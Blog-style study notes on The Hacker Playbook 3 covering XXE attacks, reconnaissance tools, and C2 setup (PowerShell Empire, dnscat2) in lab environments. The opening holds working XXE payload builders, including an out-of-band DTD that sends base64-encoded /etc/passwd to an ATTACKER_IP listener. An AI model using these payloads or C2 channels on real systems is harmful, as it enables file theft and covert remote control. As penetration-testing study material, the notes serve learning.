Next, on to attacking XML parsers. This is common in apps that allow file uploads or parse Office docs, JSON, or Flash. With improper validation, XML parsing can lead to all kinds of problems. Some additional reading from OWASP, the OWASP cheat sheet, and Infosec Institute. This one gets a new VM (are you putting your VMs on an external hard drive or lab machine yet?) since it has a custom configuration. Fire up the VM, run Burp, check out the source code. You’ll see a hidden field submitted with a POST request. The user controls the POST data, so you can inject malicious code, and most XML parsing libraries support SYSTEM, which allows data to be read from a URI. So you can craft input to exploit the XML being parsed. This worked fine to read /etc/passwd. I didn’t get it to execute a Netcat shell, but I tried some other common Linux files and could access those, so I think it’s just a matter of figuring out what exactly you can access.
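For reference, the shape of the basic payload, built here as a Python string. The &lt;search&gt; element name is my placeholder; swap in whatever element the app’s POST data actually uses:

```python
# Classic XXE: declare an external entity backed by file:// and reference
# it where the app echoes parsed content back. <search> is a placeholder
# element name.
def xxe_payload(path="/etc/passwd"):
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE foo [\n'
        f'  <!ENTITY xxe SYSTEM "file://{path}">\n'
        ']>\n'
        '<search>&xxe;</search>'
    )
```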

Advanced XXE – Out of Band (XXE-OOB)

If you couldn’t see the response or had other issues, you can go out of band by using a remote Document Type Definition (DTD), an XML file that defines the structure and legal elements of an XML doc. This is a four-stage attack:

  1. Modified XXE XML attack

  2. Get the target to load a DTD file from the attack server

  3. Read the /etc/passwd file using code in the DTD file

  4. Get the data using code in the DTD file
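For stages 2 through 4, the attack server hosts a DTD along these lines. This is my sketch, assuming a PHP parser on the target (the php://filter wrapper does the Base64 encoding, which matches the Base64 delivery I saw on the Netcat listener); the entity names and ATTACKER_IP/8888 placeholders are mine:

```python
# Sketch of the remote DTD (e.g. payload.dtd) served from the attack box.
# %file reads and base64-encodes the target file; %wrapper declares an
# entity whose URL leaks it back to the listener when referenced.
def oob_dtd(attacker="ATTACKER_IP", port=8888, target="/etc/passwd"):
    return (
        f'<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource={target}">\n'
        f"<!ENTITY % wrapper \"<!ENTITY send SYSTEM 'http://{attacker}:{port}/?%file;'>\">\n"
        "%wrapper;"
    )
```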

No luck though – I checked everything multiple times. I was getting a warning about a failure to open a stream, so it seems like it’s not getting the file for some reason. This was a different error than Kim warned about. I’ll have to do some digging to figure out what’s going on.

Doing some troubleshooting: using the exact phrasing from the book, I got a connection refused error. I spent some time thinking about that error and how to address it, and I was pretty sure I needed to set up a server/listener of some type so my target could fetch the file. Some searching on XXE-OOB turned up a nice walkthrough by ZeroSec. I tried specifying the port in Burp Repeater, and that got a connection and GET /payload.dtd HTTP/1.0 followed by Connection: Close. This was using the same port for the payload file and in Repeater.

Next I popped up a basic Python server to see what would happen and got a 404 error. I pulled up my host in the browser to see what directory it was serving from, and it was not the typical /var/www/html folder. This is just how SimpleHTTPServer (Python 2; http.server in Python 3) works: it serves files from the current working directory, so you set the directory with pushd or by moving to the desired directory first. It shouldn’t be used in production environments, but it gets the job done here. Using this, I was able to get the file I was targeting.
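Worth noting: Python 3’s http.server can take the directory explicitly (since 3.7), so the pushd dance isn’t needed there. A sketch, with the serve call left commented since it blocks forever:

```python
import functools
import http.server
import socketserver

# Serve /var/www/html regardless of the current working directory by
# binding the handler to an explicit directory (how --directory works).
handler = functools.partial(http.server.SimpleHTTPRequestHandler,
                            directory="/var/www/html")
# socketserver.TCPServer(("", 8000), handler).serve_forever()  # blocks; port 80 needs root
```

From a shell, python3 -m http.server 8000 --directory /var/www/html does the same thing.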

Here are the steps I had to take to do the XXE-OOB exploit:

  1. Create the payload file. Put it in ~, or specify the directory when starting the Python server.

  2. Start the Python server:

      # Serve the current directory
      python -m SimpleHTTPServer 80
      # Or serve /var/www/html without staying there (pushd/popd restore your location)
      pushd /var/www/html; python -m SimpleHTTPServer 80; popd
  3. Start a Netcat listener nc -lvp 8888.

  4. Deliver the payload using Burp Repeater.

  5. See the payload being accessed via the Python server.

  6. See the Base64 encoded delivery on the Netcat listener.

  7. Copy/paste into Burp Decoder to see the /etc/passwd contents.

I’m not sure if Kim didn’t have to open up a server or just presumed the reader would know to do so. Either way, I got it working and learned a simple way to stand up a server using Python that will definitely come in handy. Had I been working from my AWS instance, I would have been fine, since it’s already set up to allow access.

Lessons Learned

Cool chapter – I feel like I learned a lot about exploiting some of the newer technologies being used. It was nice to realize that I am familiar with a decent amount of the things covered or could at least connect them with other contexts. Lots of different ways of doing attacks I’ve seen before and good reinforcement. Plus some good hands-on experience with deserialization and template engine attacks. I feel like reading the chapter, then going back and doing the labs and typing my notes is working well.

Next Steps

  • Keep working on the more common web application attacks

  • Find bug bounties to practice on

  • Keep working on the other web app hacking stuff I’m doing

  • Apply the attacks learned here to the other web app hacking labs

  • Continue working on programming skills

Posted in Blog, Resources

THP3 Ch 2 Review

Picking up with chapter 2 in The Hacker Playbook 3 by Peter Kim (ch 1 notes here). I’ll be doing most of this on the provided VM. Partly for the tools already being (mostly) there, partly because I don’t want to mess up the VMs I have set up to my liking. I’ll add the tools I like later, but I’m finding a lot of resources list tools that are no longer in Kali (like Vega). I’ve got a BlackArch VM (which comes with just about all of the things I’ve found that aren’t in Kali anymore), so I may use that to continue working with some of the tools.

Disclaimer: Criminal/unauthorized hacking bad. Jail bad. Read CFAA. IANAL. Don’t do things you shouldn’t.

Nmap diffing

This chapter starts off with Nmap, which is something I’m fairly comfortable with. But this is using it to keep track of changes on the network. Cool idea, but seems a bit noisy. The author provides a script for it. From a blue team perspective, this is something your SIEM should be able to do. I like the idea of watching a network for differences, maybe even setting up an alert to watch for a specific port or service to become available. But I also know using Nmap to scan some networks (like ICS networks) is not a good idea if you care about things staying online and functional, so looking into other options would be a good idea. Perhaps something like GRASSMARLIN would be a good option for diffing ICS and SCADA networks. I’ve used it in training, and it’s pretty slick.
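The diffing idea itself is simple enough to sketch on greppable output. This is my own minimal take, not Kim’s script; running nmap -oG on a schedule and feeding the snapshots in is left to cron:

```python
# Parse nmap -oG (greppable) output and report ports that appeared
# since the last scan: the core of the diffing/alerting idea.
def open_ports(grepable):
    pairs = set()
    for line in grepable.splitlines():
        if "Ports:" not in line:
            continue
        host = line.split()[1]
        for entry in line.split("Ports:")[1].split(","):
            fields = entry.strip().split("/")
            if len(fields) > 1 and fields[1] == "open":
                pairs.add((host, fields[0]))
    return pairs

def new_since(previous, current):
    return open_ports(current) - open_ports(previous)
```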

Kim recommends improving on the provided Nmap script by checking different ports, doing some banner grabbing, etc. Depending on what’s on the network you are targeting, there is a good chance you may need to check something outside of the default Nmap scan, so adding some port specifics to the script would be helpful. I’ll file that away. Writing scripts is something I want to get better at, so that aspect of this this book will definitely be good for me.

Web screenshots

Some cool stuff here – HTTPScreenshot and Eyewitness are both pretty straightforward. I’m not convinced these offer a lot of utility over some of the tools discussed in Michael Bazzell’s Open Source Intelligence Techniques or available on his website, but I can see using all of the tools in different situations.

With HTTPScreenshot, I got a bad range spec for the URL I was scanning. I had it entered in the text file as specified, so that was a little frustrating. I ended up doing an nslookup to get the IP address. Shoved that into the networks file, and it worked fine. I’m not sure if you have to use an IP or CIDR notation to make it work with the ./ option, but that’s what I had to do. I tried doing just the httpscreenshot option, and got a permission error. I checked the permissions on the file, and I didn’t have permission to execute the file. I found that odd. I had to chmod the file, but then it worked fine.

EyeWitness worked like a charm. No issues there, but remember your scope when you are putting in your target info. This scan consists of OSINT, so it’s “ok”, but it’s something you should always be aware of.

Cloud Scanning

This is a cool section. There’s no denying the importance of cloud infrastructure. Kim noted that many tenants can use dynamic IPs, so servers may change IPs and aren’t necessarily even going to be in the same block since you can set up your instance all over the world. There are references provided for where the big cloud providers have their IP ranges (Amazon, Azure, and Google Cloud).

Network/Service Search Engines

Basically, ways to find things. Shodan is cool. You do need an account to search, and the paid tiers let you do more. I picked up a lifetime membership for $5 on Black Friday. It included an ebook on how to use Shodan, so I’ll be digging into that more. It’s a powerful tool that can provide a scary amount of info. I noticed in my initial playing around that searching by IP gives a lot of detailed info. The IP might change, but if the target is using a baseline image, getting this info on one IP may provide some good info even after the IP changes. Censys was a new one to me. It’s the same basic idea as Shodan: scan all the things. My VPS showed up there by domain quicker than it did in Shodan, and Censys doesn’t require a login of any kind, which is nice. Kim also identified a script tool available to use with Censys to find subdomains.

For both, I went through the domain in the book and my VPS domain. Then I spent some time searching different things to see what the different options are. I think the big thing with these is knowing what they are and what they can help you see so when you are working on a pen test or bug bounty you know your options.

Manually Parsing SSL Certificates

I got info on certs from both Shodan and Censys, but having a manual option is good. This was a Python scraping tool – sslScrape. It’s a neat little tool written by Kim and bbuerhaus. One thing I’m coming back to as I work through these tools is that I have to keep working on my coding skills so that I can develop my own tools.

Subdomain Discovery

Subdomains are more difficult to determine, understandably so. But the info is important because it can indicate server type, some servers don’t respond by IP, and it can give info about where servers are hosted.

Discover Scripts was the first tool. It combines all the recon tools in Kali, has quite a few options, and is still maintained as of November 2018. You can add API keys for several tools (including Shodan) to improve the results from recon-ng; not required, but advantageous. I’ll add that to my list of things to do… It does take the info found and dig deeper, so this is another tool where you’ll want to be mindful of scope. There’s an update script that needs to be run from within the Discover Scripts folder; be prepared to wait awhile while it runs. And by awhile, I mean start that sucker and go to lunch or something. It shouldn’t always take forever, but it can if you haven’t updated in awhile.

I found the syntax a little hard to follow from the ReadMe and the book, so I’m including it here in a way that makes sense to me. This is from download through a domain search:

git clone /opt/discover
cd /opt/discover
...a bunch of options
...options for your choice
...more options

Wait a minute and it will pop up a list of choices. They are relatively self-explanatory. Enter the number of your choice, and go through the choices as needed. For a passive domain scan:

cd /opt/discover
Choice: 1
Choice: 1

Then let it do its thing. This will also take awhile (I’m sensing a theme here). You’ll get some red output, generally related to missing API info. Then it pops out a report. Hit enter to open it, and be patient because (surprise!) it takes a bit of time to open the many, many associated Firefox windows. Pretty cool stuff. The report is saved to the /root/data folder for reference. I found a walkthrough that may be helpful as well.

Knock was straightforward and will accept a VirusTotal API key. It uses a wordlist to see if subdomains resolve, so you need a comprehensive one. Kim suggests the one from jhaddix, and there’s the SecLists collection of wordlists on Github. Quite a few are already in Kali, possibly including SecLists depending on your install. This one also takes awhile. You get status codes for the subdomains, and I think this is a good candidate for sending output to a file: you can save to CSV (-c, --csv; -f, --csvfields to include field names in the first row) or JSON (-j, --json), or use the standard &gt; redirect to a txt file. (Nice little refresher on sending output here.)
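What Knock is doing under the hood boils down to resolving wordlist candidates. A sketch with an injectable resolver, so the logic can be sanity-checked without real DNS (by default it does live lookups):

```python
import socket

# Try each wordlist entry as a subdomain and keep the ones that resolve.
# Pass a custom resolver for offline testing; socket.gaierror (NXDOMAIN
# and friends) subclasses OSError.
def brute_subdomains(domain, wordlist, resolver=socket.gethostbyname):
    found = {}
    for word in wordlist:
        candidate = f"{word}.{domain}"
        try:
            found[candidate] = resolver(candidate)
        except OSError:
            pass
    return found
```

Swap in a big wordlist and this is the slow part: one lookup per candidate is exactly why these scans take awhile.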

Sublist3r does some Google-dork-style searching for subdomains. I got an error about urllib3 and chardet; quick googling brought me to a solution from Gloria Palma Gonzalez, which got the job done. Skip the sudo if you are already root.

sudo pip uninstall requests
sudo pip install requests
sudo pip uninstall docopt
sudo pip install docopt

The next tool, subbrute, has now been integrated into Sublist3r; just add the -b option. I found this option to be very, very slow. Sublist3r by itself ran in a minute or so; the subbrute option took longer than my patience would allow, and running it separately also took a good while. I do expect it to take time since it’s going through a huge wordlist, but keep the runtime in mind: whether pen testing or doing a bug bounty, time is money, so pick your tools accordingly. I ran it in verbose mode to verify it wasn’t hanging, and that also outlasted my patience. I decided to run a timing test, because I want to have an idea how long things will take. This was on the THP3 VM as provided. I went with 100 threads and basically walked away to let it do its thing. It took roughly…forever. I think it hung after about 18 hours, and I ended up killing it because it wasn’t making progress. This looks like something better run from a server, but my AWS instance is (likely) not built in a way to do the job much faster. I didn’t get great results with subbrute, so I’ll be exploring other options. I found a write-up saying a scan took more than 15 minutes on a Digital Ocean instance that, guessing from the price given, has 4 GB of memory and 2 vCPUs. If you’ve got a VPS with comparable or better specs, you may get better results.

While digging into some stuff on subbrute, I found a nice write-up on discovering subdomains by Shpend Kutishaj of Bug Crowd. It had some good background and info on other tools, including a cool script by Jason Haddix that I’ll be experimenting with.

Kim also mentions MassDNS. This was labeled as experimental in its ReadMe. It also notes that the resolvers are outdated and a lot are dysfunctional. And it may result in abuse complaints being sent to your ISP. I ran it to see what it would do, but at this point, it’s not a tool that I’m likely to keep in rotation for general labbing and playing around because of the risks. It is very fast though, so I’ll save it for specific use cases.


Basically dig around on Github to see if anyone made an oops and pushed code or other sensitive data to a public repo. Search in Github or do a Google dork.

Some tools for searching Github

  • Truffle Hog – scans for high entropy strings (likely keys); I had to run it a couple of times to get it to work; probably a good idea to send the output to a file for review
  • git-all-secrets – combines open source git search tools to find all the things; requires an API token (Settings – Developer settings – Personal access tokens to generate); didn’t accept my token…
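For my notes: the “high entropy” test Truffle Hog runs is basically Shannon entropy over candidate strings. A sketch of the idea (the sample key below is fake, and Truffle Hog’s actual thresholds differ per character set):

```python
import math

# Shannon entropy in bits per character: random-looking keys score high,
# ordinary words score low.
def shannon_entropy(s):
    if not s:
        return 0.0
    probs = [s.count(c) / len(s) for c in set(s)]
    return -sum(p * math.log2(p) for p in probs)

# A fabricated key-like string scores well above an English word
shannon_entropy("AKIA3f9Zq7xWp2LmR8dY") > shannon_entropy("password")  # True
```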

I tried several troubleshooting options with git-all-secrets. I got it to work with an API token with no scopes enabled, though I sometimes had to start it a couple of times. The key seems to be no spaces after the =.

docker run -it abhartiya/tools_gitallsecrets:v3 -repoURL= -token= -output=results.txt

The default for output is results.txt. When I changed it I got the message panic: open : no such file or directory. Then when I tried to copy the data after completion, I got an error that the container path specified didn’t exist. I think this has to do with the container and where I was trying to put the output file. Using the default, it worked fine using Kim’s syntax:

docker cp :/data/results.txt .

But it didn’t work with the syntax from the README, which is:

docker cp :/root/results.txt .

I’m not sure if this is because of the provided VM or not. I’ll have to try on a different VM, but moving on for now. Either version would put the results file in the /opt/git-all-secrets/ directory because of how the command line interprets the . (a good primer on using the Linux CLI is The Linux Command Line by William E. Shotts, Jr. – easy to read and helps you understand what’s going on behind the scenes). If you want it elsewhere, specify your filepath.

docker cp :/data/results.txt 

For reference, info about Docker commands was helpful for understanding what’s going on if you aren’t familiar with Docker. It does seem you can use the name of the container rather than the ID in the commands, which is much easier to do. I’m not as familiar with it as I would like to be, but that’s not a squirrel I want to chase at this moment.


When I went to use Slurp, it wasn’t on my version of the VM. Odd. So onto the google…apparently, slurp doesn’t exactly exist as linked anymore. The repo was removed by the owner. The account has been taken over by SweetRollBandit, who is using it to make a point about account takeover on Github. Checking the THP3 Updates, the repo has been copied and is now being maintained by nuncan. A bit of fiddling to get things going here based on the updates and the README.

git clone /opt/slurp
mv slurp/vendor slurp/src
export GOPATH=
go build
cd /opt/slurp

Then search as indicated.

./slurp domain -t
./slurp keyword -t 

Bucket Finder was much more straightforward. You just have to make the list of words to search for. Take the S3 buckets found and pop them in a browser to see what’s exposed.

For the next part, you need an AWS account. This is where things get a bit icky if you are trying to maintain op sec. To get one, you need to provide email, phone, address, and credit card info. You can sort of get around it, but that’s not something I’m comfortable with. But I’m also not going to use the security key from my AWS account for anything other than these labs without knowing a lot more about how things are tracked within AWS. Yes, it generally shouldn’t be an issue for ethical hacking, but for situations where op sec might be needed, this may be something to skip.

The tko-subs tool is interesting and straightforward. Two other tools are listed for domain takeovers, HostileSubBruteforcer and autoSubTakeover, but I didn’t get into either beyond confirming their existence and taking a quick look at the README.

Kim ends the cloud section with a link to the flAWS challenge that is a CTF for AWS. This is something I’ll file for future usage.


Can we agree that publishing an online directory of employee emails that match the username convention should be frowned upon? It’s one thing to get the format of emails; that can be helpful for social engineering and digging for more info. But handing out half of the login creds (assuming two-factor isn’t being used) just sounds like a bad idea.

SimplyEmail worked well. No issues there. YAY! I did note that like several other tools, it’s now been tested with Docker, so Docker is definitely something to get more comfortable with as a pen tester.

Then Kim talks about past breaches. There’s a lot of stuff out there. There are good ways of accessing some of the info (like haveIbeenpwned) and not good ways (like buying the info). Keep it legal folks.


The chapter ends with a brief mention of OSINT stuff. There’s a ton of stuff. I’m working through Michael Bazzell’s Open Source Intelligence Techniques 6th ed, which is great. I could do an entire post just on OSINT stuff that I’m finding useful, so I’ll leave that for later.

Lessons Learned

I got a ton out of this chapter. A few highlights…

  • Check syntax on a big screen where you can more easily identify spacing, etc.
  • Get both URL and IP info for targets – some tools will only accept one or the other
  • Be sure to add the URL and IP info to the hosts file if working on a test network
  • Look more into tools being presented so you understand the risks/benefits – check them out to make sure they are what they say they are (see Slurp earlier)
  • Check Kim’s updates as you go to keep an eye on changes
  • I’m amassing a ridiculous amount of info on various tools and what not and have to have a way to keep them organized and up to date
  • Taking notes in this format means I have to figure out why things aren’t working and fix the problem
  • Doesn’t look like there will be any “short” chapter notes for this book
  • Writing these in Markdown saves a stupid amount of time when posting

Next steps

  • Play around more with Shodan and Censys
  • Look into API keys for recon-ng: Bing, Builtwith, Fullcontact, GitHub, Google, Hashes, and Shodan
  • Look into API key for Knock: VirusTotal
  • Develop scheme for keeping track of tool info – check out RTFM and BTFM as potential sources, but will want something dynamic b/c Slurp
  • Figure out why WordPress didn’t like my code fences
Posted in Blog, Resources

THP3 Ch 1 Review

My book club has moved on from Practical Packet Analysis (great read – highly recommend) to The Hacker Playbook 3. I plan to write up notes on each chapter, mostly for my reference. These will likely be mostly pictureless brain dumps, but may give some useful info. So here goes…

Disclaimer – hacking is illegal, read CFAA, don’t go to jail, etc.

Preface notes

Author Peter Kim recommends doing the hands-on work, including pushing scripts and code to Github. That’s a little scary to think about (people will see!), but a good idea. So I’ve set up a repository on my Github for THP3 stuff. The blog posts/notes will serve as more of my record since I’m not sure how much script writing I’ll actually be doing.

Remember hacking is illegal, disclaimers, etc. Big thing here is get WRITTEN permission and make sure the powers that be know what’s going on. A side note here is that this may include third parties such as cloud vendors. Luckily there are lots of legal places to practice hacking and pen testing. I have a bunch that I like, but that’s a different post.

Intro notes

Interesting comparison of pen testing versus red teaming. I see the need for both, but I suspect red teams as described are beyond the capabilities of most orgs. Kim also mentions showing value back to the company. This seems to be something that can be a struggle in cybersecurity in general. It’s hard to put value on something being avoided, but it’s something that needs to be done.

1 Pregame – The Setup notes

Lots of good background in this chapter, but the bulk was getting set up. Kim recommends setting up an external server. I’m definitely more comfortable using a VM, but I decided the practice would be good for me. I went with an Amazon Lightsail server running Ubuntu. Doing this with the recommended specs will probably run about $5/month. You could opt to set everything up using VMs, but I wanted the practice and learning at least a little about AWS can only be good for me.

Spinning up the instance was simple and only took a few minutes. You can access the server through a CLI in the browser or use an SSH client. I’ve mostly used the CLI option so far, but I’ve got PuTTY downloaded to set up the SSH option. Kim does note the need to set up iptables on your VPS (virtual private server); iptables is a firewall utility built into Linux. I want to get into this more, but for now I’m using the firewall manager through AWS. I need to find out more about how the two will work together (or fight) before I start with iptables. Plus, since I can access the AWS firewall from the dashboard, I’m less likely to fork my access. I’m making notes of things I need to follow up on, but I want to stay on task with the material.

Installing The PenTester’s Framework was straightforward. There are lots of instructions on how to do that, so I’m not going to get into that here.

I will note that a lot of the tools that are talked about the rest of the chapter are included in PTF, so you don’t necessarily need to install them separately. I’ve worked with PTF a little, but I’ve done more in Kali. I’m looking forward to working with both as I work through the book. Kim talks about having a process to repeatedly setup machines and mentions the possibility of running Kali in Docker on AWS. This is something I’ll need to work on later, but it was simple to spin up the instance and get PTF loaded. I have a process for when I start a new Kali VM to install the non-standard tools that I like, so I’ll add tools to that process as appropriate.

Some of the tools mentioned…yes, I’m being lazy and not doing the links.

  • Metasploit – it’s Metasploit, lots of info out there
  • Cobalt Strike – license is expensive, so I’m waiting to do a trial for when I know I’m going to have dedicated time to spend. Armitage seems to be a relative and is pretty straightforward.
  • PowerShell Empire – needs a real cert to work best. More on this later.
  • dnscat2 – creates an encrypted command and control channel, should be fun to play with. Has turned into a pain, but I’m sure will be a good learning experience.
  • p0wnedShell – C# PowerShell host app that runs PowerShell payloads without powershell.exe. Just installed, no labbing yet.
  • Pupy Shell – run Python on all the things without installing Python. Just installed, no labbing yet.
  • PoshC2 – command and control thing in PowerShell to help hack things. Just installed, no labbing yet.
  • Merlin – do cool things with HTTP/2. Just installed, no labbing yet.
  • Nishang – use PowerShell for red team stuff. Just installed, no labbing yet.

Getting most of these installed and testing them out was straightforward. I’m waiting on Cobalt Strike, so other than thinking it looks cool, no real thoughts there. Getting a cert installed for PowerShell Empire was the biggest hurdle. This was more because it seemed daunting than anything else.

Setting up for PowerShell Empire

Really brief summary of getting Empire going (at least to the level I need right now).

  1. Get a domain name. I picked up a cheap one from NameCheap.
  2. Set your AWS instance to a permanent IP.
  3. Install domain name on AWS instance. This post from Joshua Miller had great instructions using NameCheap. Note – you manage DNS in AWS from the overall dashboard, not the instance dashboard.
  4. Make sure your domain name is connected by navigating to the server by name rather than IP. This may take some time, but it happened within minutes for my instance.
  5. Get a trusted cert and install it on AWS instance. This post from Black Hills Info Sec had a great walkthrough. Probably should make a note of the cert path (/etc/letsencrypt/live/[domain]/fullchain.pem).
  6. Check and make sure your domain name now works as https.
  7. Wonder why your domain name isn’t working as https.
  8. Keep wondering…
  9. Facepalm when you realize you forgot to adjust the firewall to allow https.
  10. Laugh at yourself for forgetting to adjust the firewall and remind your book club that they might need to let https through the firewall of their VPS.
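Steps 5–10 above boil down to something like this sketch. The domain is a placeholder, and I’m showing ufw for the firewall piece – if you’re managing the firewall from the Lightsail dashboard like I am, open 443 there instead:

```shell
# Get a Let's Encrypt cert for the domain (certbot's standalone mode
# needs port 80 free, so stop Apache/etc. first).
sudo certbot certonly --standalone -d yourdomain.example

# The cert and key land under /etc/letsencrypt/live/<domain>/
ls /etc/letsencrypt/live/yourdomain.example/
# fullchain.pem  privkey.pem  ...

# The step I forgot: actually let HTTPS through the firewall.
sudo ufw allow 443/tcp

# Sanity check from another machine:
curl -I https://yourdomain.example
```

If that curl hangs, check the firewall before blaming the cert.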

And laugh again when Ian Coldwater tweets about breaking the Internet by leaving Intercept on. Because you’ve done that at least once this week and you’ve accepted breaking the Internet is going to happen regularly when you’re doing this stuff. Just remember to check your stuff before panicking and yelling at your ISP.

dnscat2 setup

The other bit of oddness was getting set up for dnscat2. The author used GoDaddy, so I had to do some experimenting for Namecheap. I got my domain added under the personal DNS server (with ns1.[IP] and ns2.[IP]) and nameservers (ns1.[url] and ns2.[url]). Note that to get your personal DNS servers to show in the dashboard on Namecheap, you need to do a search – they don’t show up automatically, so I kept thinking I’d screwed something up. I wasn’t entirely confident in what I had done, so I did some digging and found good references from iagox86 (the tool’s author) and The Subtlety. I was able to check and make sure the setup was working. I ran into another error – address in use – when I ran the script to start dnscat2.
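One way to check that the delegation is actually pointing at your VPS before fighting with dnscat2 itself (domain is a placeholder, and this is just how I’d sanity-check it, not anything from the book):

```shell
# Confirm the registrar is handing out your custom nameservers.
dig +short NS yourdomain.example

# Then confirm queries for the domain actually reach your box:
# run a capture on the VPS...
#   sudo tcpdump -ni any udp port 53
# ...and from another machine, look up anything under the domain:
dig test.yourdomain.example
# If the query shows up in the tcpdump output, delegation is working.
```

This separates "Namecheap isn’t set up right" from "dnscat2 isn’t set up right", which saved me some head banging.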

After some digging, it seems there can be an issue with Ubuntu and systemd-resolved. Looking over a StackExchange thread about the issue and the man page for systemd-resolved, I think it was conflicting with dnscat2 over port 53. You can check the listening processes with netstat -plnt to see exactly what the issue is. Killing the process with plain kill didn’t work, so I stopped the service instead (probably not a great idea), but it let dnscat2 work. And it’s easy enough to start and stop (systemctl start/stop systemd-resolved). So I got the server working, but then the client timed out. More head banging…but luckily someone in the book club had dealt with this and had a write-up – thanks Vext! I also found a walkthrough for using dnscat2 with PowerShell from Black Hills Information Security that I want to file for future reference. Basically you have to add the --no-cache option when starting the server. Based on the posts from Vext and Black Hills, it’s a DNS issue that may be either DNSSEC related (based on Vext’s experimenting) or nslookup not randomizing its initial DNS transaction IDs (per Luke Baggett’s Black Hills post). Either way, it solved the problem.
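Putting that troubleshooting together in one place (domain and paths are placeholders; the --no-cache flag is the Black Hills/Vext fix):

```shell
# See what already owns port 53 – on Ubuntu it's usually systemd-resolved.
sudo netstat -plnt | grep :53

# Stop it for the session. Heads up: local DNS resolution on the VPS
# may break while it's stopped; systemctl start systemd-resolved brings it back.
sudo systemctl stop systemd-resolved

# Start the dnscat2 server without caching so finicky resolvers behave.
cd dnscat2/server
sudo ruby ./dnscat2.rb --no-cache yourdomain.example

# From the client machine, connect via the tunnel domain:
./dnscat yourdomain.example
```

Worth remembering that stopping systemd-resolved doesn’t survive a reboot, which is fine for a lab box you’re only using for this.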


That wraps up chapter 5. Lots of good info. There was a lot of stuff I’m familiar with, but setting up a Lightsail instance was definitely outside of my comfort zone. It wasn’t difficult once I made myself just sit down and do it, but there’s something a little more serious about setting up a VPS than a VM. I also spent some time playing with Armitage during an ICS training, and if Cobalt Strike is a better version of that, I completely see its worth.

I definitely need to spend some time with Empire and dnscat2. There wasn’t much hands-on stuff with the other tools, just getting them installed. A lot of those installs duplicated what’s already there with PTF. Hopefully the duplicates won’t break anything, but I know that’s a possibility. The nice thing about a VPS is that if it gets completely forked, I can either roll back to a previous snapshot or kill it and make a new one. That’s not remotely the attitude I would take with a production server, but it’s nice for labs.
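The snapshot-and-reset workflow can be scripted, too, if you have the AWS CLI configured. A sketch – the instance name, zone, and bundle ID here are placeholders for whatever your Lightsail instance actually uses:

```shell
# Snapshot the lab box before doing anything risky.
aws lightsail create-instance-snapshot \
    --instance-name thp3-lab \
    --instance-snapshot-name thp3-lab-clean

# If the box gets forked, spin a fresh instance from the snapshot.
aws lightsail create-instances-from-snapshot \
    --instance-snapshot-name thp3-lab-clean \
    --instance-names thp3-lab-2 \
    --availability-zone us-east-1a \
    --bundle-id nano_2_0
```

Same thing the dashboard buttons do, just repeatable.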

Moving forward…

The amount of info in the book is very dense, and it’s definitely not a cookbook with exact steps and syntax written out. I feel like this is good and bad. It’s good because I’m having to look up more information about the tools, what they do, and how to use them. I’m also figuring out where I want to put things to stay organized since I’m installing some of the tools on my other VMs. There were several places where the earlier editions were referenced with the indication that the material wouldn’t be repeated in the third edition. I understand that, but it would have been helpful to have all of the material together.

I’m really glad I’m doing this for the book club in the BrakeSec Podcast Slack. Being able to bounce ideas off of the rest of the group has been invaluable. I would get through it on my own, but the accountability and having people to work through issues with is going to make it a lot easier. I hope to start getting my notes up closer to the book club discussion, but we’ll see how that goes.